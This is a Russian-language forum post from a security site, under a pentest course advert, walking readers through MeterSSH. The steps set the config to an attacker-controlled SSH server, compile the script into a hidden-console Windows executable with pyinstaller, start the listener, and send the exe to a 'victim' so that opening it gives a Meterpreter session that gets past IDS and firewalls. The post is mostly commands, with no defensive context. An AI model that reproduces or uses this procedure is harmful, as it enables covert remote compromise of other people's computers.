• 🚨 24 часа до повышения цены на курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    Последний день записи в текущий поток по старой цене Подробнее о курсе ...

Статья Meterssh - обходим IDS и Firewall используя Meterpreter через SSH

  • Автор темы Автор темы Tayrus
  • Дата начала Дата начала
  • Теги Теги
    meterssh
Добрый вечер, я диспетчер, не хотите .... а в прочем не важно.
На форуме я не нашел обзора на этот инструмент, хотя он за 2014 год.
И начинаем мы с вами с установки.

Первым делом мы должны скачать этот инструмент(хотя вы можете открыть код файла и переписать его(для true мазохистов))
Код:
git clone https://github.com/trustedsec/meterssh
Теперь мы должны подогнать конфиг инструмента под себя
Код:
gedit meterssh.py
Нас интересуют эти строчки
Код:
user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attackers SSH server
port = "22"
После того как вы изменили конфиг вы должны скомпилировать скрипт формата .py в .exe.

Для чего это делать? Если вы отправите .py скрипт жертве и на его машине не будет установлен python, запустить скрипт он не сможет.
Теперь мы устанавливаем pyinstaller на ваш windows/linux с wine.
Вводим такое заклинание в консоль
Код:
pyinstaller -F --noconsole meterssh.py
После компиляции приступаем к следующему шагу.

Пишем
Код:
python monitor.py
Код:
service ssh restart
Отлично, теперь отправьте meterssh.exe(скомпилированный pyinstaller-ом скрипт) жертве.
При открытий файла жертвой у вас появиться это
2018-07-28_16-21-16.png

2018-07-28_16-22-19.png

Мы получили meterpreter.
На этом все.
 
в 2018 было заебись щас уже палиться сборка.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Курс AD